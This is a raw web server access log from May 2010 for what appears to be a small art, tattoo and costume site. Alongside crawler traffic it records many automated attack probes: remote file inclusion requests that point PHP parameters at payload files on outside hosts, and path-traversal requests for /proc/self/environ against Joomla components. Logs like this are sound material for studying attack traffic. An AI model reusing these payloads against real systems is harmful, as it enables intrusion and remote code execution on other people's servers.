87.250.255.243 - - [20/May/2010:19:02:04 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:19:03:19 -0500] "GET /artwork/menorahs.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:19:07:32 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:19:09:00 -0500] "GET /logs/access_log.1272672000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [20/May/2010:19:10:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [20/May/2010:19:11:51 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [20/May/2010:19:12:47 -0500] "GET /logs/access_log.1265155200/mvcw.php?step=1&vwar_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
187.45.193.159 - - [20/May/2010:19:16:03 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
187.45.193.159 - - [20/May/2010:19:16:03 -0500] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
187.45.193.159 - - [20/May/2010:19:16:04 -0500] "GET /logs/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:19:16:58 -0500] "GET /logs/*.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
198.170.141.58 - - [20/May/2010:19:16:59 -0500] "GET /*.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:19:17:30 -0500] "GET /artwork/banners.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.215 - - [20/May/2010:19:19:50 -0500] "GET /artwork/furniture.htm HTTP/1.1" 200 1004 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729)"
58.125.181.214 - - [20/May/2010:19:20:25 -0500] "GET /errors.php?error=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.125.181.214 - - [20/May/2010:19:20:25 -0500] "GET /logs/errors.php?error=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.125.181.214 - - [20/May/2010:19:20:25 -0500] "GET /logs/access_log.1273363200%20%20/errors.php?error=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:23 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:24 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:24 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:25 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:25 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:21:27 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.119.155.36 - - [20/May/2010:19:22:55 -0500] "GET /index2.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.194.35 - - [20/May/2010:19:23:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.35 - - [20/May/2010:19:23:40 -0500] "GET /artwork/big-catch-diorama.png HTTP/1.1" 200 60457 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:19:25:57 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:19:26:51 -0500] "GET /errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:19:26:51 -0500] "GET /logs/errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:19:26:51 -0500] "GET /logs/access_log.1265241600/errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:27:13 -0500] "GET /logs/access_log.1271548800/modules/Neos_Chronos/header.php?base_folder=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:27:13 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:27:14 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://163.20.166.223:8080/appserv/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.208.34.38 - - [20/May/2010:19:27:36 -0500] "GET /logs/access_log.1271808000/port.php?content=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
81.208.34.38 - - [20/May/2010:19:27:36 -0500] "GET /port.php?content=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
81.208.34.38 - - [20/May/2010:19:27:36 -0500] "GET /logs/port.php?content=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
81.208.34.38 - - [20/May/2010:19:27:36 -0500] "GET /logs/access_log.1264118400/port.php?content=http://gbox.hobby-site.com/romanians//spaw/images/id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:19:28:15 -0500] "GET /logs/access_log.1273536000 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [20/May/2010:19:29:29 -0500] "GET /logs/access_log.1271548800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:29:46 -0500] "GET /logs/access_log.1271548800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
89.163.148.130 - - [20/May/2010:19:32:04 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:19:33:55 -0500] "GET /tattoo/ HTTP/1.1" 200 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:19:34:40 -0500] "GET /logs/access_log.1270857600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
86.109.105.151 - - [20/May/2010:19:35:37 -0500] "GET /logs//index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
86.109.105.151 - - [20/May/2010:19:35:37 -0500] "GET //index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
195.56.172.136 - - [20/May/2010:19:35:43 -0500] "GET /logs//index.php?option=com_awdwall&controller=%03../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
195.56.172.136 - - [20/May/2010:19:35:44 -0500] "GET //index.php?option=com_awdwall&controller=%03../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.250.255.243 - - [20/May/2010:19:36:34 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
200.201.180.130 - - [20/May/2010:19:37:06 -0500] "GET /index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.201.180.130 - - [20/May/2010:19:37:06 -0500] "GET /logs/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.201.180.130 - - [20/May/2010:19:37:06 -0500] "GET /logs/access_log.1270857600/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.201.180.130 - - [20/May/2010:19:37:06 -0500] "GET /logs/access_log.1271376000/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:19:39:00 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [20/May/2010:19:39:11 -0500] "GET /errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:39:11 -0500] "GET /logs/access_log.1265241600/errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:39:11 -0500] "GET /logs/errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.88.4.141 - - [20/May/2010:19:39:41 -0500] "GET /logs/access_log.1271116800/errors.php?error=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.204.245.212 - - [20/May/2010:19:40:27 -0500] "GET /index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.204.245.212 - - [20/May/2010:19:40:27 -0500] "GET /logs/access_log.1271376000/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.204.245.212 - - [20/May/2010:19:40:27 -0500] "GET /logs/access_log.1270857600/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.204.245.212 - - [20/May/2010:19:40:27 -0500] "GET /logs/index.php?menu=deti&page=http://www.sly8.com/sly8/bbs/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
131.107.151.126 - - [20/May/2010:19:41:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""MSRBOT"
131.107.151.126 - - [20/May/2010:19:41:19 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""MSRBOT"
131.107.151.126 - - [20/May/2010:19:41:20 -0500] "GET /CA3CA2F8BFBB7ADD HTTP/1.0" 404 288 "-""MSRBOT"
87.250.255.243 - - [20/May/2010:19:42:02 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:19:44:01 -0500] "GET /artwork/trunks.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:19:45:47 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 1953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [20/May/2010:19:47:50 -0500] "GET /logs/access_log.1233187200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:47:53 -0500] "GET /logs/access_log.1233360000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:47:55 -0500] "GET /logs/access_log.1233446400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:47:57 -0500] "GET /logs/access_log.1233619200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:47:59 -0500] "GET /logs/access_log.1233705600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:48:02 -0500] "GET /logs/access_log.1233792000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:48:04 -0500] "GET /logs/access_log.1233878400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:48:06 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:48:09 -0500] "GET /logs/access_log.1234137600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:19:48:11 -0500] "GET /logs/access_log.1234224000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [20/May/2010:19:49:47 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
89.163.148.130 - - [20/May/2010:19:50:15 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:19:50:15 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:19:50:15 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
189.16.34.178 - - [20/May/2010:19:51:17 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
189.16.34.178 - - [20/May/2010:19:51:18 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:19:53:03 -0500] "GET /artwork/paintings.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
218.38.34.19 - - [20/May/2010:19:54:41 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:19:54:41 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:19:54:41 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.34.19 - - [20/May/2010:19:54:51 -0500] "GET /logs/access_log.1265673600//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:19:56:46 -0500] "GET /logs/access_log.1272499200 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
88.131.106.30 - - [20/May/2010:19:58:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [20/May/2010:19:58:13 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
65.55.2.140 - - [20/May/2010:19:58:41 -0500] "GET /logs/access_log.1181692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.123 - - [20/May/2010:19:59:38 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
87.252.3.123 - - [20/May/2010:19:59:38 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
87.250.255.243 - - [20/May/2010:20:01:09 -0500] "GET /logs/access_log.1272326400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:20:06:58 -0500] "GET /artwork/toys.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.177 - - [20/May/2010:20:07:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:20:08:58 -0500] "GET /logs/access_log.1271894400 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:20:13:22 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:20:14:32 -0500] "GET /logs/access_log.1213833600%20%20//autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:20:14:32 -0500] "GET /logs//autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:20:14:32 -0500] "GET //autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:20:14:36 -0500] "GET //autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:20:14:36 -0500] "GET /logs/access_log.1213833600//autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:20:14:36 -0500] "GET /logs//autoclose.php?subd=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:20:16:20 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:20:19:10 -0500] "GET /logs/access_log.1256428800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [20/May/2010:20:21:55 -0500] "GET /logs/access_log.1271548800//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
114.108.177.125 - - [20/May/2010:20:21:55 -0500] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
114.108.177.125 - - [20/May/2010:20:21:55 -0500] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
114.108.177.125 - - [20/May/2010:20:22:26 -0500] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
114.108.177.125 - - [20/May/2010:20:22:26 -0500] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
114.108.177.125 - - [20/May/2010:20:22:32 -0500] "GET /logs/access_log.1271548800//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:24:33 -0500] "GET /logs/access_log.1262304000//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:24:33 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:24:33 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6405 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:25:22 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:25:22 -0500] "GET /logs/access_log.1272067200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:25:22 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6405 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:20:25:24 -0500] "GET /logs/access_log.1184976000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
119.63.193.56 - - [20/May/2010:20:25:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
211.174.62.150 - - [20/May/2010:20:25:55 -0500] "GET /logs/access_log.1266019200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:20:25:55 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:20:25:55 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6405 "-""Mozilla/5.0"
211.174.62.150 - - [20/May/2010:20:25:55 -0500] "GET /logs/access_log.1266537600//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.180.226.34 - - [20/May/2010:20:25:56 -0500] "GET /logs/access_log.1220054400 HTTP/1.1" 404 310 "-""-"
211.5.245.2 - - [20/May/2010:20:27:14 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:27:14 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 6405 "-""Mozilla/5.0"
211.5.245.2 - - [20/May/2010:20:27:14 -0500] "GET /logs/access_log.1272067200//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:20:29:52 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
109.71.40.35 - - [20/May/2010:20:32:40 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /logs/index.php?option=com_redshop&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /index.php?option=com_redshop&view=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /logs/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:11 -0500] "GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
94.23.9.198 - - [20/May/2010:20:36:12 -0500] "GET /logs/errors.php?error=http://arena.asteis.net/modules/PNphpBB2/includes/cmd.txt??????? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
